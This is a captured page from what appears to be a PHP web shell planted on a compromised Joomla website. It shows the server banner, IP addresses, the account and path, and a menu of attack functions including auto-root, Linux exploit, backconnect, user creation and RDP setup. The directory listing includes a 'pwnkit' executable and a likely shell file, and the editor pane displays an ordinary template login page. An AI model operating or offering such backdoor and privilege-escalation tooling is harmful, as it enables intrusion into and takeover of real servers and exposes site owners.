Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
templates /
wavo /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
features
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
headers
[ DIR ]
drwxr-xr-x
html
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
offcanvas
[ DIR ]
drwxr-xr-x
overrides
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
sppagebuilder
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
comingsoon.php
780
B
-rw----r--
component.php
2.6
KB
-rw----r--
en-GB.tpl_wavo.ini
19.04
KB
-rw----r--
error.php
4
KB
-rw----r--
helper.php
3.36
KB
-rw----r--
index.php
19.87
KB
-rw----r--
offline.php
2.75
KB
-rw----r--
options.json
14.51
KB
-rw----r--
options.xml
53.76
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
templateDetails.xml
3.34
KB
-rw----r--
template_preview.png
151.15
KB
-rw----r--
template_thumbnail.png
23.82
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : offline.php
<?php /** * @package Helix_Ultimate_Framework * @author JoomShaper <support@joomshaper.com> * @copyright Copyright (c) 2010 - 2021 JoomShaper * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later */ defined ('_JEXEC') or die('Restricted access'); use Joomla\CMS\Factory; use Joomla\CMS\Helper\AuthenticationHelper; use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Text; use Joomla\CMS\Layout\LayoutHelper; use Joomla\CMS\Router\Route; use Joomla\CMS\Uri\Uri; $twofactormethods = AuthenticationHelper::getTwoFactorMethods(); $doc = Factory::getDocument(); $app = Factory::getApplication(); ob_start(); ?> <div class="coming-soon-login"> <form action="<?php echo Route::_('index.php', true); ?>" method="post" id="form-login" class="mt-5"> <div class="row gx-3 align-items-center"> <div class="col-auto"> <label class="visually-hidden" for="username"><?php echo Text::_('JGLOBAL_USERNAME'); ?></label> <div class="input-group mb-2"> <div class="input-group-text"><span class="fas fa-user" aria-hidden="true"></span></div> <input name="username" type="text" class="form-control" id="username" placeholder="<?php echo Text::_('JGLOBAL_USERNAME'); ?>"> </div> </div> <div class="col-auto"> <label class="visually-hidden" for="password"><?php echo Text::_('JGLOBAL_PASSWORD'); ?></label> <div class="input-group mb-2"> <div class="input-group-text"><span class="fas fa-key" aria-hidden="true"></span></div> <input name="password" type="password" class="form-control" id="password" placeholder="<?php echo Text::_('JGLOBAL_PASSWORD'); ?>"> </div> </div> <?php if (count($twofactormethods) > 1) : ?> <div class="col-auto"> <label class="visually-hidden" for="secretkey"><?php echo Text::_('JGLOBAL_SECRETKEY'); ?></label> <div class="input-group mb-2"> <div class="input-group-text"><span class="fas fa-user-secret" aria-hidden="true"></span></div> <input name="secretkey" type="text" class="form-control" id="secretkey" placeholder="<?php echo Text::_('JGLOBAL_SECRETKEY'); ?>"> </div> </div> <?php endif; ?> <div class="col-auto"> <input type="submit" name="Submit" class="btn btn-success mb-2 login" value="<?php echo Text::_('JLOGIN'); ?>" /> <input type="hidden" name="option" value="com_users" /> <input type="hidden" name="task" value="user.login" /> <input type="hidden" name="return" value="<?php echo base64_encode(Uri::base()); ?>" /> <?php echo HTMLHelper::_('form.token'); ?> </div> </div> </form> </div> <?php $login_form = ob_get_clean(); echo LayoutHelper::render('comingsoon', array('language' => $this->language, 'direction' => $this->direction, 'params' => $this->params, 'login' => true, 'login_form' => $login_form));
Close